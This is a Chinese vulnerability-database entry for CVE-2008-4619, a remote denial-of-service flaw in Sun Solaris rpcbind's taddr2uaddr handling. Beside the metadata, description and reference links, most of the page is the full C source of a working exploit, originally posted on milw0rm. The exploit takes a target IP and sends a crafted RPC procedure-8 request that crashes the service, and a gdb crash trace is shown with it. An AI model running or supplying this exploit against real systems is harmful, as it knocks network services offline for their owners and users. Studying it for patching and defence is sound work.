Sun Solaris RPC请求拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116432 漏洞类型
发布时间 2008-10-17 更新时间 2009-01-29
CVE编号 CVE-2008-4619 CNNVD-ID CNNVD-200810-318
漏洞平台 Solaris CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/6775
https://cxsecurity.com/issue/WLB-2008100189
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-318
|漏洞详情
SunSolaris中的RPC子系统允许远程攻击者借助一个特制的对程序100000(rpcbind)中的进程8的请求,引起拒绝服务攻击(后台程序崩溃)。它与XDR_DECODE操作和taddr2uaddr函数有关。
|漏洞EXP
/*
////////////////////////////////////////////////////////////
// Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS
////////////////////////////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]globalST[dot]com[dot]ar
/////////////////////////////////////////////////////


Program received signal SIGSEGV, Segmentation fault.
0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1
(gdb) backtrace
#0  0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1
#1  0x00013d88 in rpcbproc_taddr2uaddr_com ()
#2  0x000161c0 in rpcb_service_4 ()
(gdb)

*/

#include <string.h>
#include <rpc/rpc.h>

struct xdr {
        long long_arg;
        char *string_arg;
};

typedef struct xdr xdr;
static struct timeval TIMEOUT = { 25, 0 };

bool_t xdr_xdr (XDR *xdrs, xdr *objp) {
        register int32_t *buf;

         if (!xdr_long (xdrs, &objp->long_arg))
                 return FALSE;
         if (!xdr_string (xdrs, &objp->string_arg, 4096))
                 return FALSE;
        return TRUE;
}

char ** str_4(xdr *argp, CLIENT *clnt) {
        static char *clnt_res;

        memset((char *)&clnt_res, 0, sizeof(clnt_res));
        if (clnt_call (clnt, 8,
                (xdrproc_t) xdr_xdr, (caddr_t) argp,
                (xdrproc_t) xdr_wrapstring, (caddr_t) &clnt_res,
                TIMEOUT) != RPC_SUCCESS) {
                return (NULL);
        }
        return (&clnt_res);
}

main(int argc, char *argv[]) {
  CLIENT *c1;
  char *server;
  char **sresult;


  if (argc !=2){
    printf("=============================================================\n");
    printf("Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS\n");
    printf("-------------------------------------------------------------\n");
    printf("Federico L. Bossi Bonin <fbossi@globalST.com.ar>\n");
    printf("=============================================================\n\n");
    printf("usage: %s <IP>\n",argv[0]);
    exit(1);
  }

  server = argv[1];

if ((c1 = clnt_create(server,100000, 4, "tcp")) == NULL){
       clnt_pcreateerror(server);
    exit(1);
  }

  xdr xdrmessage; 
  xdrmessage.long_arg = 0;
  xdrmessage.string_arg="";

  if ((sresult = str_4(&xdrmessage, c1)) == NULL){ 
   clnt_perror(c1, server);
   exit(1);
  }

  clnt_destroy(c1);
  exit(0);
}

// milw0rm.com [2008-10-17]
|参考资料

来源:FEDORA
名称:FEDORA-2008-9204
链接:https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00819.html
来源:MLIST
名称:[oss-security]20081031Re:CVE-2008-4619/milw0rm6775
链接:http://www.openwall.com/lists/oss-security/2008/10/31/2
来源:MLIST
名称:[oss-security]20081029Re:CVE-2008-4619/milw0rm6775
链接:http://www.openwall.com/lists/oss-security/2008/10/29/1
来源:MLIST
名称:[oss-security]20081028CVE-2008-4619/milw0rm6775
链接:http://www.openwall.com/lists/oss-security/2008/10/28/2
来源:MILW0RM
名称:6775
链接:http://www.milw0rm.com/exploits/6775
来源:VUPEN
名称:ADV-2008-2945
链接:http://www.frsirt.com/english/advisories/2008/2945
来源:SUNALERT
名称:200412
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-66-200412-1
来源:SREASON
名称:4440
链接:http://securityreason.com/securityalert/4440
来源:SECUNIA
名称:32475
链接:http://secunia.com/advisories/32475